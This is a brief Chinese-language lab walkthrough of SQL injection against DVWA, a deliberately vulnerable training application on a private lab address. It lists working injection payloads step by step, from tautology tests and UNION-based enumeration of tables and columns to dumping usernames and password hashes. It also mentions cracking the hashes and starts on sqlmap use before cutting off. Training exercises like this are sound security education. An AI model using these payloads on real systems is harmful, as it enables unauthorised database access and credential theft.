DVWA
SQL Injection
测试目标网址: http://192.168.247.150/dvwa/vulnerabilities/sqli/
low安全级别
进行手工注入测试
1' or 1=1 #
1' or '1'='1' #
测试成功,构造payload,完成漏洞注入利用
猜解查询语句的字段数
1' or 1=1 order by 1 #
1' or 1=1 order by 2 #
获取当前数据库名称
1' union select 1,database() #
获取数据库中的表名
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
1' union select 1,table_name from information_schema.tables where table_schema='dvwa' #
获取表中的字段名
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
下载数据
1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
MD5解密得到密码
https://www.cmd5.com/
利用SQLmap进行注入
发现SQL注入点,进行注入测试
http://192.168.247.150/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
利用语句sqlmap -u 目标地址进行测试,需要添加cookie值才能完成相关测试
可以添加–